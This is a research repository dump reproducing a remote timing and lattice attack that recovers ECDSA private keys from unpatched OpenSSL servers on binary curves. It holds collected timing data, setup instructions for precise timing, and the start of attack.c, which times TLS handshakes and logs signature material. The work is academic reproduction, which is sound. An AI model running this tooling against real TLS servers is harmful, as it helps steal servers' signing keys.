677631360312853848863067231692317060828542922610 247527924441018339326490672725676152015442344117 1728216900633410532442472265329678269472476215505 152 | 38146999148536939213094946238027832736800900424 346017174373963316573953122459362683000709444971 2409413596717577051786497617478488951010427227279 855739919959981805839942619512011425343364150954 153 | 24837547997172747021525035259511578284505316563 11306557297032596933988466011437326282652905066905 3299886335120074225778641993656470885128020634000 1980448390397921111258129189680083645969273091589 154 | 25057902692638600094545296140441512552522604763 3178588293697973133993231773490671236961450252922 2671281934499207819980305204534864959516719514156 2274268415989652632639906970097572249676173696238 155 | 28392297903098294078035096693844552003784457813 11524982941800166232345079417093538512757542284673 2087912218013553896974889822893204884811450441952 3009233317258690993945242280751767291461468210346 156 | 43330927102123982063950520474076464855148940056 2881306020646103244837261374212023389996071800527 216433468180294537181664348213566081052033846481 2344795556861719071218317700544075686838618495110 157 | 32931754517283506244831499543154922135052541903 2654061619306392211957675984555407350976223691730 5025737582174983393173229444248990728421183962811 5454324890322254527729397120095931499477342086976 158 | 32483333135716813998357046094716635282701943407 9000736108010704884546360146534235997818638107230 1673758402424062331391724995582018560819758881341 607584197669439006787397671793480348374855861936 159 | 34898473119972069997151756749721977797116277154 7082847553141956799562010579293631322008781098081 3277064830155250724005795109828986368499688023776 623426705162841162127244633299566957231869775687 160 | 24605230047833580599374712338007129481937618005 1367841833250521935042329562555312557538406752681 2591305694999457653472724661495937533230408063308 713435530387074348611596204040843606673436850431 161 | 
40335747784063195919063913569041223026956320532 6557683056168550767540073521567039123793069583441 146353452844689769291473764557037167246472032811 4752769919120599130213129859831579667500789309637 162 | 28495711602425949098723651989910465266357771080 2843564878217911939368551346146388463129896632294 2014636313167991733805552378331465726262542823570 723164591151226735288009670393184413040910827693 163 | 39583884563529433635792032218099295134564061196 384289921385757152475804949870421444160670508970 1231271383798687476372959900973380127798136842635 3172537727745437609251811848791153310100299823811 164 | 31735436485044007150162716323564287807533185677 6060331853366571647308625928429534689938461549622 2225762185075785546169826200752061342785494649413 670703993003406842050893339899353228547355636445 165 | 27893861174292913402148455928236416419146815436 5660328590162355846210969664250277939415608125957 309417578257873709775717874105742494561522452039 1911380456592165946227060106442283836803216544207 166 | 41507315067584419938913701164209609788347046505 5086059839262279294946951587500611275572580386556 1197717501899380543596332950202090434776560979022 3160885659767412103879810265384843293484934120262 167 | 32470574590528251994887188486789097084351600795 3945042525630145847716897853168897955293704412649 581278082964649255218093995392485437215302394604 3039755299033316284190039343022896787766688440217 168 | 40698978968493703623773993999428343497419630590 3056103990856672023589379430809923800537761394672 1619769240774432535048213015879153093213073532124 858680889838887787579797321784129301333318287976 169 | 30384250216949219587243917372286314675027509520 5554098563217130054501936649360895218134683359281 5161201554234106824998592899651815133428610951029 5124446465780369205596242496926839804367728487884 170 | 33150866520873859371907361711783689802036947898 1856895368575514908030341857090631772452927293538 4652378485110090731358097464858793178356190990133 
83283290394101097706121911840735158513147935718 171 | 43850254418609465071184379218970326065811597521 10363253210000186321683722767163725718861887610297 4427506897501777443997423493162367052213015521881 3928815264027196567897782584793941024679382417520 172 | 40510764257481852168124634028263717765994149957 4580117335263014216885617000356761382206885235242 1031265583179792622491022585415017873127865254248 5556345571093603695551848311630056254231612951908 173 | 42796897555701362913966622344289903056454144610 1220511130724566122767113369159645238965096573873 5338603703304087528573438552933301125437559104423 2745838674870142323674907299920251339189751799891 174 | 36646439354520965585023886336104038259666201438 8141904395848222095661367054735998678318957615817 5756952062648569603965161507886693363948920524976 3884430030502166460518274338911832608021841957633 175 | 39666728477256846050423122736506610842040160996 3615689667007338756573617866467548704909489340964 5435832535101230077531366675641290437171305313683 2199921228790330518017447861094788183700251267892 176 | 30914358389723416050600729935778017605728690637 5709019981088993804618546568646172102866439274555 4029345773157648902565941587391476563663057467380 1778383199919006329063947807921462752410991417457 177 | 42678718352046909040443406698394374386947934500 9485803990020976346257340493566761342763417309034 241539248934411390206794668413133339585649374123 3243343251474689450979348104919262001505905233174 178 | 33950972114772829573679383373395509406542029168 9142712134005661874207005727419312879184742168947 990212477930888351183509698875598716151618977018 4850296307705612994626754426317646414348078567430 179 | 25873536173073576730042318243129657486748616486 6025730163867870970866196095524774484927062007787 3180205269053270717796213193300815561685470104528 3152110144864516514165563925184734898326261100231 180 | 23140063258484283705869204916627849282252348692 1726483144051223814653493617922778693279208052951 
4539609801163187887347038652800680028704903065249 230174674850070972121268527728294376577545674811 181 | 37716891630358846282384210878713635712558496903 8262904077920337121501727204796656017974874176184 2792809945832015779331005468026454794361042800311 2802576726049955913948621299125280071623645668895 182 | 27350691579289984926439973013774633711826986226 2982332556563499925649231821376499858286492903326 1933916034840273127147296320630478386356609269186 3644782352604708545079380762832643872929763477478 183 | 28046587719276740005380717936732371391483078851 11669204468442333160580731979564764886179981199686 5708089301290509092480389160747852819711017158250 2588955056670151497882653024623112819363437224570 184 | 37971539443486001417837663049868743793322084561 1201040835602132402238925093590981179803786027288 3072334978887845950626579887305762284568661934978 5368433985144360897269712687923861474859700269172 185 | 36668414457096204190921683334128949714767575455 11040792213340581413707560126033855795506160978067 3112212692193420073347106373161208424894729086676 5244279821678157042090530587453991967198831806668 186 | 24471765187292093394049909755581092022714604919 630806789233673890949042596430537711498705946911 4855800984679239085409099242992601911973986402441 2740219618649665778364919413073583603231104960377 187 | 43880490054352322816088819095432835010359418211 27462015832097870183257023672953362767400239790 2558011188748545389149791540723314748554674260992 688610614319893213445078327924404951237862329001 188 | 29784979101510679859878212928884625488157710284 8201608553395799013741780040988734192814102595289 2459121458574172166053925961752331804793478930716 3336469767492459618282400449646646704716915754713 189 | 28756040362093634531615938610109262007300127538 8320077441212388498852351398963673733453150361939 23293643450404709901796560553740893831010510370 4997686137105200176882511816252823791835119821625 190 | 31197890836200703585862141288263346342819922232 
7168496633727322280886515915531203989274445094114 2841916646005235010814642348318483834921878432499 229731557094744106851366341467672282702448243526 191 | 27013421896467601672244345523167035987908316984 5061729989520042196547119039034086501400344775586 4415285561100507647737512839461247404387455108836 1454998255709148267862685703023832432437348061529 192 | 34577126445222667333972597485984370281632921896 976149176325866303154048300505565143481625113245 2699219990545451832882188759395307701118563139379 3986164151885582917082759718491127070012970380078 193 | 41949365861671763820618326318326020791766291903 552100724539693223571556575841201753605008334070 1633467005615074273358859497808523719040408652729 1432242208181864793916572508443480093159388813320 194 | 31199968412734596498049230505343880307004863879 4515395557313931028444562869278468131366408900728 2201984124520777179919428685134442451918666433939 5439789129257673652676487751502560942478034289467 195 | 43731698869495080955728483930243789889346731609 7566714513669288396481065660161957657059731069121 3466078248299853940193170436800847815651496581569 3099449637742757763897771779819370514845260670243 196 | 33181009487366881250886521136752906962309651000 2464107149978559526588108228235745223803197579390 2140281197064144379907152459929630890327825055112 2646125756755974416834047820064284130465232342212 197 | 23789731508295107476218861993053282586784733023 7380417224078731172300685391850971012423109624217 1505371885333641177135891063700168037786152405595 1089756718941210613681308598376414937794739336206 198 | 44000921913816372769507814100801807927706733470 11663667035983016995263897063816006109249746638278 297754335691077042886367633687006805336098314792 3943316765348974618512359740244805404846301393447 199 | 23021222770571621016700104206353535332425236935 2005993423756019160359205329806386196257647056746 804666270209541669533792363096516552144707573612 1650954560925406860016366230084557251579157476528 200 | 
37693550444101520515624593218726495537821884736 2596232146350930300514508852342126327300835073294 4516921765774990131323059407282410847310268244954 3513745465091427719441179552987257847319650837323 201 | 32822436211517548830358541286349669958667024470 4838839625898064182372553999964352991539621580644 1926808344612205794778541489540305765931982985310 4319320260848237579637196840428166030808896153455 202 | 24297944202676079266416604093262273900561178882 7250558265042663059571828264345900608386664910773 5603002258627833845317229914964656386156375737037 5181882476942979963100931844172173970571156028713 203 | 34579636697566190859272170380024976111978401915 10655996630259061751779400873379110518085902176236 1531278032690161790855543147543226025822594590626 3345934398790266821086728632203737231659501983277 204 | 42600476090326403351031368484028867230610210456 188862688804246488864277087570183570478058764276 1013716148335418900365510589953123124932364626001 2625586228931405151379467304478307227904942634457 205 | 28142031751262552707813264822532618033086945529 6092171231028438094762281065022426007053544208935 4657605500264041372883809751725474327230463786342 2414951004601903616704254367907354860807854252198 206 | 41808276141069591902511708186965917884147083234 3037110468197402529908358666358360987711825201011 5545723286071115793852098803469042509806150329253 194712412194779191856958263847233048008405784582 207 | 39531619083054058737871536571890325671367856479 7390955660239735133300774296172077596200907254902 4755478374639115552546005278639995529042647706979 4343242853251981383365053895067762234357059117688 208 | 28304337588339672313118279739545978316111321320 10357670358067570193971487426687668168736062563884 2965490952364811587286929015660781911296019780769 4402388169081069280642100116208385662640248475473 209 | 38335057460807536826794380562617150021993416742 145365640659258610776342991891825959885577151661 3503603754940231572339401177002432849562270534828 
381742507401436454396401435044668219854513223507 210 | 32085151427677131251406344764314773472367577508 9123329041153575744065200510847962255439899156750 4384282907599615439068370313107175179187626134 3592441386475325231801572902156371035014141562282 211 | 38941394565121420416498304075854395079630439359 5452162022749830232314221821615398816549304716910 132052037246845598174790866979735449818086611466 621849462872725662371241033328901270722548604200 212 | 36349560827182937139997910616313155428773716275 11411537666376176379433821339854261465517840972007 2280657661163709472953466249127082661645673806355 4700440800765088481464487039713149971395447139927 213 | 44687758832165182373969959299489384949469988673 9381072273985925441348645416396716185813962328230 2159010772065521675881877867860555613205863358350 3963022690548565634891104347518413455636289459108 214 | 37781920547051369380566313701522886729449491297 1250963201945841519254267097530678584039084680378 2784338360339729043761587101811264577089322975020 3088348273032789682734783710872729977750658543126 215 | 40562163255489721426393827123496102272870685846 2554197754418146131685485131284587798546946044664 2872864632012028929576726698339792821411362166042 3387953189885443324160342096722012935878762798371 216 | 29359016419734946781721368231565126700159757312 571210089262063839487730669317021677497357483220 5127834043263518468280231166638487038425121258204 1959924343789379553855122571905096929160470126814 217 | 29669970181301267648573464778413161624717822175 3751176004876311989213001763535435061262457941811 3523824778930264051417813131491134416546438528520 3598771361491831395694052559322524653122602928422 218 | 43266240670431200061457223598652194528107174760 4982087809492080467831442419099186314282722894532 4992235144650857259595648942011797200604986734018 2075803460654493931354546596750181351402781164446 219 | 38953080207317859701690009185222014710334748969 8092220577648009767473031952407506604690921306467 
694352163036885924210117216590308518718245603399 3546019645192820526357286089465151125959440203132 220 | 41631066021868861897323160900990753813919551678 7115205455327886273596383485538525460456624833856 1546696073210768920451151866548836657528755642263 3645474827090027745023340259092803253980764015617 221 | 28961470557952212091869326945667824254593354139 5043467113430322329513161660829069751836428482616 5646713718123356883687245348174729218754616054637 4418713753962870627208032515430151771956443120522 222 | 33879853091574286620837797985379131771534662694 3265448881435658269973492624385513829658358739950 3548263727547718171892568718141948963948719433567 2717343912278503284844561515628569409335177964598 223 | 23415764331702616632763982882618327220611471213 2105213392337454440599380973822916731820843699591 4485706908734161525281734937013493657947792405120 156783857297603320020980897607148294819882769228 224 | 35464044190742015762903018738568279230833263673 585737687245191088820590120066678469752340637804 4405571098473795594171079825528114971918273490352 3293406999066152643783978633350909439004344717955 225 | 43498179377399138152009855976311888852108461662 9276611311760283748520919438004588680868688464231 2452153864658925581880263870922814937757664804673 4824432559718297074966977953727173876619815847847 226 | 36388362249476153856051640933560132351349099029 3633859403789963362178324291280829128456822771032 3806963716090660857956066856284561911292242223832 1599327940807697925504114764807691718941513259002 227 | 28650215264501658970439582187536362142904344167 2280150553733973186254174999087509970609937571568 5578018078058908350429087020862848438913083149324 1330654488671122061870572626995660598657588008660 228 | 39726693503431104017282350688201238650739723969 3951183600615946071033776627500562122717389700277 4249646292648545720765503065141846414751842892365 3121899337256851412600849828702381711811475121783 229 | 39914152283185220876915172365875948185441827704 
6533286767739305968626092894685533861649380200603 3962265956766943496062410555540686766597859332650 1643935699255421136578798605420937193752178903105 230 | 44547021399781219520202841096034378023468661526 582777179900522967713445736598213905828984643675 5264087908691634154357288063842166203795905882006 3046377984096103605685173174595999069514608904369 231 | 31631182654456783972610144815568643812155507258 10680879039154446853518523258590872997713694318196 4554836225344556567476548282951979707524606949199 993725301847979757488110444975769372259126057450 232 | 30643021443776344332727151627334755579449206961 11316238269701079461759890873795544476347604777342 2721140262240353721163155510276977056257910701130 5480373119232345894585309123421866376766030035519 233 | 41462915762373668590232793050132295537057824962 4749142569298845148622254564627920568098634348289 2366811721500095416696455721571677720269702522280 5128569370579742660492763598613546818778119785667 234 | 26218467276836206230231425689471438906501045847 9740065066684598014897586956755212669569544698714 3567409713043511816232113242954446081127008521074 3839321338022538030626426205701873911998922193448 235 | 32737543668529339665770551517595718398416179234 8494872864904665618418199271288866997853805576840 672020301083788874956651588351801309282265202913 4088778338025673177422981414133236503504273365471 236 | 28683803432536300613545279304054095808672755667 306919100921195592593142984798498862185799853193 4071226603363338731831753687407044930783570301765 3384215959915693354829473661742378032660041445451 237 | 27577274248204885788948283762657612003722373988 6775183415515752699755251045057810170136150256979 137685843477330348562213081430517924587546303541 1499684231578757291669562488234196590249236455882 238 | 23732375458889988724245326518805566076829435910 3655754353538465268698152501357848638921151700251 5103009226412785427273959277746174386141199511424 1320223176192918864649896869832566409550842923715 239 | 
27919369551071649941619265598177495792266629074 2307912056287208192898131684077260680390341432198 1983800160442368859445335090824233852318036588202 1028406777596679974806725963502083995359425880430 240 | 40852846956428919099814966361054938684178782146 4471950959498051509261909253259544879077012501520 5630457071140250303193706778636325121811330839089 1348776453011038213667631522926619293569210781617 241 | 23947243338253077098077234053841791882660002957 2548296149164858169258694965392294449053513717876 2084127259413772371564827966752378223353108644688 4775174641271012592942892940847963738972091881874 242 | 29285454184390781925092373680671008862661653666 1670220350575709136597075493728188209693348373848 5340168753165924290038759598514179539039669320492 167744810551491429094752051992488493124652030723 243 | 30784400772253631939129240550928176176404616333 7320848291643176778653837168934440555381479662245 1293714317532839165601440467561116780711813968488 168919666019257915661595997587099080005155991004 244 | 24099472288191001914254876887498322319324769852 7357509845129117586429858165261091802655088617382 1044816584938863682516299843962825699593436991547 5533196046317351493531506637463534442407981751865 245 | 33065175769425505274896380539990485710799457841 9441052508558540049600182537160629505341528198101 1298380601209508066520441676649963475979085667284 1109506525110366382523343221574908787384372563904 246 | 30137135897572965483878796720860903029464632974 4597830753047070361800889932156136185609174540723 2523909305160841310753874266221891588778684964382 826494963609020810652075980273790492816650653075 247 | 24936122496011178797852878482123258219724925420 9592520105354326457754817065385532666045628026453 5672817947420818276999337960048019037571204279190 3952096783999093128408617430452818220064590008186 248 | 30142831128763453686911930957453017213756444564 2442931533190941716697533544086042183167687853417 2151803828182041529900136487731519303111601464541 
5261588590360858326007163196000358938663622209662 249 | 32491712188080948155712103830887839766116790240 2752860575553268895717663740064579376292851486890 5192570453710785543261971539188799767060864283409 3777539983009637934260540737738840954799231922811 250 | 26167054189496596996628249792442563492322401658 2240056801840142680511019922798362232325577194821 3281993178363183199579777358944649136205413277927 657809628854440025158878926811529745457178009504 251 | 39744345804313710809708542943130445479573037355 5713589801826144576976106140082560912645267998299 4246542998952942248312275928111159334125160008863 938613073525621905749540965034859261385300023061 252 | 23641281532091112532431689615271862849403924415 9655484081208795146578175985957553149368397456008 308423359824534377739954955329121057564135023708 2441085871984777311619837022837818631989379666743 253 | 41271733620429357649644318199678128344454765528 9489345953660337577340010629447007319230512527861 759727030928515515422835171827721819017475292839 4886479254687502606633398356590839127912833159980 254 | 40150881432097694617319416568869005666241233902 6089851760298573635878426850742613363676538434076 2294868163821891940078819024076472838304549480671 1238584861676281530086145292813404641079902366125 255 | 33470869937276328559264623408692405725857303200 5165628500158470027227554908047189193117614721952 4582633674723527616175365797414085783454574273821 3435620983794960564743679386475339522886165107436 256 | 29405098392824031626012019287774902975034813174 1319210292008515549729173290567995722308079989663 2911952425445330268120259024881860683625125918548 2040311270748322585631103412652628052686341457101 257 | 39908994403995772294408154367058698127118893360 11014030515204200087132618840412776745126712435794 2834903503023722031312587434316241655239813022019 1809087988331531411246616029040665489001868349799 258 | 24843373054897578624531725990620296803219402798 3636334167049960288286154789280867207230111687334 
5557627741863696422320171108821158432996153562095 152391340750583700995178322953058668336646619184 259 | 37631620833834310565016736367781933711361156084 4849065527016381971098234040572584005492195238043 2332847050878262421635621261717024707614695748657 14975374643497570547268398586401167987813060116 260 | 29416418357543778824399103974440357338039903573 1520042693073862226154713879825425979006766121385 4739447911553096987810228714856724607913164570537 1793354282491028754183946749297709882285448624389 261 | 42526188102593861297562642234022784228995635402 11313853958139176109039186499675034635057804340268 5251448642497325357856233965237294754143632213439 4165408672017145134409683398977974361190307501081 262 | 40122547677999285733113660931815955844086474778 3059829307056394701779509771744318173577629416218 2856658417417290631518974053235738283469840304108 5404291835243664515680048463297855046763110633302 263 | 26135588298340643058521243567238315588099965078 7023695002205755606256484397599254186181928005341 770445694739084563734020365953501509436669870156 2410602797292889890439783780986854502807769044681 264 | 33881992396025458221756806634334934178236964686 7428611007128097317005731321169643208289759058708 3672742304398749206591464481724645731269561540472 3409262951435561558128730609936130374830966195844 265 | 43593829485855899953668813173381759779932583330 8819461804841360176028984609071816819678059372567 5621962206030987110701123690943950602377621056331 1388404117571708405157200354026870105776711574616 266 | 27943404509641668623399016086123268862685478043 999146826777780255180143304021484033345877131022 2137772028165077242272206290100635111960379824623 1964586476863508430697839543316464816648706705841 267 | 32365542994257133848843958638911557559205799916 4271674168645480279949457330486186984995311317536 2990757419397187663505551856187296628407117593728 188759093223145750186704720381282407122710516300 268 | 44241692877958945276348537598729408129079161903 
5605422276479308037669264539478711693883117291248 4976934827447025560158419626444288527786049576029 513628387129290711566684711212347891111644025267 269 | 25350232158843404909575331461660527656339642588 8089622766314944517639901133856495374113286102509 2506799257456754392148672702383790630702789478296 5145130110501024432617009654447018435719278944300 270 | 34856526967365113164628141180087497067447387738 4637029227461280450710474215255123855310257487719 1339637732547308650584569939169792975366456219278 4453523244076186269852670312014732404761138956002 271 | 37105843080800803112449052393959726010568420166 1658238437123712685770583332331551592190002881706 1616475769717500599539542781726164124300751871529 2431170794650208150018487402320501085042966055151 272 | 29943349105685138231843875113159771016837337654 3567544401457545493039367991431244071181072816595 5768212396200765312607392900619371779191437117518 2458512726608771938218187202310105615711570963040 273 | 25141441000739403140331229501312863871438067146 681817010569480297247751153932343670064815819899 3546091846923263755194402259193532296512856407226 2929729556017367952669915173761572316434649547720 274 | 39124461088105219163204497990336701261169379971 4076803366268635091574916790585200792683576606142 66241316347992252023540865122086526139316872228 2100835711876397583178299931782127052983213934459 275 | 35301324141715275429838839418556813923841141814 11113201641757199442774917419774018305915697758961 3487611172390676903365604123934991885498638593473 3470686570767075219046934195523768277369556018502 276 | 38928422141423321410066847522865786749382553675 7603515971086859062203403391167364592271600100306 4382900291116416082508272564054426431915829805494 2349841674318686393022419577132065860978895944641 277 | 32208202781128928171366942573163556088395912244 5544441992047732808585619367085098114784508709814 995325717805424520615803592630381515101075460771 3384187276192702995614582241800570708119999374959 278 | 
40410962877653985059119958656706820498101479406 9412282510267586808008632075991925353816277344308 583834971499088301533840890113145200588447199466 426452914883655511543234606362071318794507006956 279 | 38422811038431473117286474946132921998680521749 6568010433965123959477489583789676281924608702817 3993586914334053446658604848056281418215483064040 4023237153492877243269630403771791177853375708641 280 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Timing/Lattice Attack on the ECDSA (binary curves) nonces of OpenSSL 2 | 3 | This is a work trying to reproduce and improve on *Billy Bob Brumley* and *Nicola Tuveri* - [Remote Timing Attacks are Still Practical](https://eprint.iacr.org/2011/232.pdf). 4 | 5 | You can reproduce my setup with what you find here. The lattice attack works. The remote timing is not precise enough to make the attack work (we need a huge amount of samples to make the attack work). If you can get the same setup and better timing that what I get below then you should contact me :) 6 | 7 | It works on an unpatched version of OpenSSL, but theorically it should work on any TLS framework that has such a timing attack (and not only on binary curves). 8 | 9 | But first, if you want to know more about this research [check the latest draft of the whitepaper](whitepaper.pdf), and here are also direct links to the [Timing Attack](setup/client/attack.c) and the [Lattice Attack](setup/client/offline/lattice.sage). And also a [demo](https://www.youtube.com/watch?v=P2NbKHn7RkI&feature=youtu.be) of the attack. 10 | 11 | If you know more about how to collect extremely accurate timing samples on a remote target I might need you. 
From a small sample of signatures I get mediocre results; the more signatures I collect, the better the results get: 12 | 13 | These are the results I get from a million signatures:
Maybe we can get better results on the lattice attack 39 | * Modify the ClientHello from the timing attack to only accept ECDHE-ECDSA... (so that we can test it against different frameworks). Do a `openssl s_client -connect website:443 -cipher 'ECDHE-ECDSA'` with `-msg`, `-debug` or tcpdump the traffic to get the packet. 40 | * Truncate the hash correctly in the timing attack. I still get the hashes directly from the server because I'm too lazy to understand [how OpenSSL truncates hashes](https://github.com/openssl/openssl/blob/master/crypto/ecdsa/ecs_ossl.c#L286) 41 | -------------------------------------------------------------------------------- /datasets/README.md: -------------------------------------------------------------------------------- 1 | # Datasets 2 | 3 | These are my timings; the server and the client are on the same network. 4 | 5 | Check the time of the last modification, I will update them as I make improvements in the timing accuracy 6 | -------------------------------------------------------------------------------- /setup/client/README.md: -------------------------------------------------------------------------------- 1 | # How to set up the client (the attacker) 2 | 3 | ## The attack 4 | 5 | * first compile the timer/packet sender `gcc attack.c -o attack` 6 | 7 | * configure your machine (see configuring your machine below) 8 | 9 | * run the attack through `./run_client.sh 1000` to get 1000 signatures 10 | 11 | * if you are running the server as well, check the `/setup/server/` directory and follow instructions there 12 | 13 | * check the results in `responses.log` (will get erased before every `run_client.sh` run) 14 | 15 | * use tools in `/tools/` or `/setup/client/offline/` to analyze data and/or mount the attack 16 | 17 | ## Configuring your machine 18 | 19 | ### Frequency Scaling 20 | 21 | I disable the frequency scaling so as to get good results counting the CPU cycles. 
22 | 23 | ``` 24 | sudo apt-get install cpufrequtils 25 | 26 | sudo cpufreq-set -c 1 -g performance 27 | sudo /etc/init.d/cpufrequtils restart 28 | cpufreq-info 29 | ``` 30 | 31 | or add `GOVERNOR="performance"` to `/etc/default/cpufrequtils` 32 | 33 | this also works: `sudo cpupower -c 1 frequency-info` 34 | `sudo cpupower -c 1 frequency-set` 35 | You can also disable ondemand daemon so that it doesn't cancel this after reboot: (although that might not be what you want to do) 36 | 37 | ``` 38 | sudo update-rc.d ondemand disable 39 | ``` 40 | 41 | Don't forget to disable this after your attack :o) 42 | 43 | Note: if you have the `intel_pstate` driver you need to disable it and use another driver (`acpi-cpufreq` for ex): 44 | > You can check your settings with `cpufreq-info`. It will show a block of information for every core your processor has. Just check if all of then are in perfomance mode, and at the maximum speed of your processor. 45 | 46 | https://wiki.archlinux.org/index.php/CPU_frequency_scaling 47 | https://wiki.archlinux.org/index.php/Kernel_modules 48 | 49 | `sudo cpufreq-set -c 1 -d 2600000` 50 | 51 | > The idea that frequency can be set to a single frequency is fiction for Intel Core processors. Even if the scaling driver selects a single P state the actual frequency the processor will run at is selected by the processor itself. 52 | 53 | > intel_pstate can be disabled at boot-time with kernel arg intel_pstate=disable 54 | 55 | `GRUB_CMDLINE_LINUX_DEFAULT="isolcpus=1 intel_pstate=disable"` 56 | 57 | ### Dedicate one whole core to your attack only 58 | 59 | http://stackoverflow.com/questions/13583146/whole-one-core-dedicated-to-single-process 60 | 61 | * Add the parameter `isolcpus=1` to linux boot arguments. [How to do this](http://askubuntu.com/questions/19486/how-do-i-add-a-kernel-boot-parameter) 62 | 63 | * Use IRQ affinity to stop interrupting on that CPU. 
[See redhat](https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Performance_Tuning_Guide/s-cpu-irq.html) 64 | 65 | * Use CPU affinity to use only the cpu 1 for your attack, this is already done (see *optimizations already made*) 66 | 2nd answer 67 | 68 | ### Power Management 69 | 70 | > Modern processors power management features can cause unwanted delays in time-sensitive application processing by transitioning your processors into power-saving C-states. 71 | To see if your application is being affected by power management transitions, boot your kernel with the command line options: 72 | processor.max_cstate=1 idle=poll 73 | This will disable power management in the system (but will also consume more power). 74 | For more fine-grained control of when power-management is turned off, use the PM QOS interface in your application to tell the kernel when to disable power saving state transitions. 75 | 76 | from https://access.redhat.com/articles/65410 77 | 78 | ## Optimizations already made 79 | 80 | ### CPU priority 81 | 82 | Use `nice` to set the CPU priority to `20`. 83 | 84 | ### CPU affinity 85 | 86 | Only use one CPU for your app. If you are using the `run_client.sh` utility this is already done for you. But you can modify it to use another CPU (0 by default) 87 | 88 | ``` 89 | taskset -c 0 my_program 90 | ``` 91 | 92 | ### All but one byte 93 | 94 | Send everything but one byte, then send one byte and start the counter, this will not work if Nagle's algorithm has not been disabled first. 95 | 96 | ### Stop the counter as soon as you receive a response 97 | 98 | Modifying OpenSSL to stop after signing something with ECDSA, we can check that the client doesn't receive anything. This proves that OpenSSL sends all the TLS record messages at once after finishing signing with ECDSA. 
99 | 100 | ### Disable Nagle's algorithm in Linux 101 | 102 | From [wikipedia](https://en.wikipedia.org/wiki/Nagle's_algorithm): 103 | 104 | > Nagle's algorithm, named after John Nagle, is a means of improving the efficiency of TCP/IP networks by reducing the number of packets that need to be sent over the network. 105 | 106 | Disabling it allows us to send what we want to send as fast as possible. 107 | 108 | ## Open Questions for better results 109 | 110 | ### UDP? 111 | 112 | Since there are less rules on UDP packets, we could use that to attack ECDSA on a DTLS server, which should share the same ECDSA implementation as the TLS code. 113 | 114 | 115 | -------------------------------------------------------------------------------- /setup/client/attack.c: -------------------------------------------------------------------------------- 1 | #ifdef __i386__ 2 | # define RDTSC_DIRTY "%eax", "%ebx", "%ecx", "%edx" 3 | #elif __x86_64__ 4 | # define RDTSC_DIRTY "%rax", "%rbx", "%rcx", "%rdx" 5 | #else 6 | # error unknown platform 7 | #endif 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #define BUFSIZE 1024*1024*10 23 | 24 | typedef unsigned long long ticks; 25 | 26 | unsigned char *receive_buffer; // buffer to save the response 27 | 28 | void error(char *msg) 29 | { 30 | perror(msg); 31 | } 32 | 33 | void init(){ 34 | if(receive_buffer != NULL){ 35 | bzero(receive_buffer, BUFSIZE); 36 | } 37 | else{ 38 | receive_buffer = malloc(BUFSIZE); 39 | } 40 | } 41 | 42 | uint64_t send_request(unsigned int index, char* ip, int port_no, char* request, int len){ 43 | 44 | int sockfd, n, ii; 45 | struct hostent *server; 46 | struct sockaddr_in serv_addr; 47 | uint64_t start_ticks, end_ticks; 48 | 49 | if(port_no <= 0){ 50 | error("ERROR wrong port number"); 51 | } 52 | 53 | // open socket 54 | sockfd = socket(AF_INET, SOCK_STREAM, 0); 55 | 56 | // 
disable Nagel's algorith on the socket 57 | char* flag; 58 | int result = setsockopt(sockfd, /* socket affected */ 59 | IPPROTO_TCP, /* set option at TCP level */ 60 | TCP_NODELAY, /* name of option */ 61 | (char *) &flag, /* the cast is historical cruft */ 62 | sizeof(int)); /* length of option value */ 63 | 64 | 65 | 66 | 67 | if (sockfd < 0){ 68 | error("ERROR opening socket"); 69 | } 70 | server = gethostbyname(ip); 71 | if (server == NULL){ 72 | fprintf(stderr, "ERROR, no such host\n"); 73 | exit(0); 74 | } 75 | bzero((char *) &serv_addr, sizeof(serv_addr)); 76 | serv_addr.sin_family = AF_INET; 77 | bcopy((char *) server->h_addr, 78 | (char *) &serv_addr.sin_addr.s_addr, 79 | server->h_length); 80 | serv_addr.sin_port = htons(port_no); 81 | if (connect(sockfd, (struct sockaddr *) & serv_addr, sizeof(serv_addr)) < 0){ 82 | error("ERROR connecting"); 83 | } 84 | bzero(receive_buffer, BUFSIZE); 85 | 86 | // Write all but the very last byte 87 | n = write(sockfd, request, len - 1); 88 | 89 | // Now send the last byte, which also starts processing at server side. 90 | n = write(sockfd, request + len - 1, 1); 91 | 92 | // Start the timer... 
93 | register unsigned cyc_high, cyc_low; 94 | asm volatile("RDTSCP\n\t" 95 | "mov %%edx, %0\n\t" 96 | "mov %%eax, %1\n\t" 97 | : "=r" (cyc_high), "=r" (cyc_low) 98 | :: RDTSC_DIRTY); 99 | start_ticks = ((uint64_t)cyc_high << 32) | cyc_low; 100 | 101 | /* We get rid of the error so we can process faster */ 102 | /* if (n < 0){ 103 | error("ERROR writing to socket"); 104 | } */ 105 | 106 | // Read the first byte 107 | read(sockfd, receive_buffer, 1); 108 | 109 | // Stop the timer 110 | asm volatile("RDTSCP\n\t" 111 | "mov %%edx, %0\n\t" 112 | "mov %%eax, %1\n\t" 113 | : "=r" (cyc_high), "=r" (cyc_low) 114 | :: RDTSC_DIRTY); 115 | end_ticks = ((uint64_t)cyc_high << 32) | cyc_low; 116 | 117 | // read the rest of the message 118 | n = read(sockfd, &receive_buffer[1], BUFSIZE) + 1; 119 | 120 | // save the answer 121 | FILE* response_file = fopen("responses.log", "a"); 122 | fprintf(response_file, "{ "); 123 | 124 | // analyze the packet and re-read if n is too small compared to the length 125 | int length; 126 | int node = 1; 127 | int jj; 128 | ii = 0; 129 | 130 | // ClientHello.random 131 | fprintf(response_file, "'client_random': '6d70d7a74344e7ccf7c3ace7c77ff39f\ 132 | 9d9b2ea56d26ac9292224aa32f17c10b', "); 133 | 134 | // ServerHello.random 135 | fprintf(response_file, "'server_random': '"); 136 | for(jj = 11; jj < 11 + 32; jj++){ 137 | fprintf(response_file, "%02x", receive_buffer[jj]); 138 | } 139 | fprintf(response_file, "', "); 140 | 141 | // Let's skip the Certificate message 142 | while(node != 3){ 143 | length = (receive_buffer[ii + 3] << 8) + receive_buffer[ii + 4]; 144 | ii += 5 + length; 145 | node++; 146 | } 147 | 148 | // Parse the message and the signature 149 | ii += 9; 150 | length = receive_buffer[ii+3]; 151 | 152 | // ServerKeyExchange.params 153 | fprintf(response_file, "'server_params': '"); 154 | for(jj = ii; jj < ii + 4 + length; jj++){ 155 | fprintf(response_file, "%02x", receive_buffer[jj]); 156 | } 157 | fprintf(response_file, "', "); 158 | 
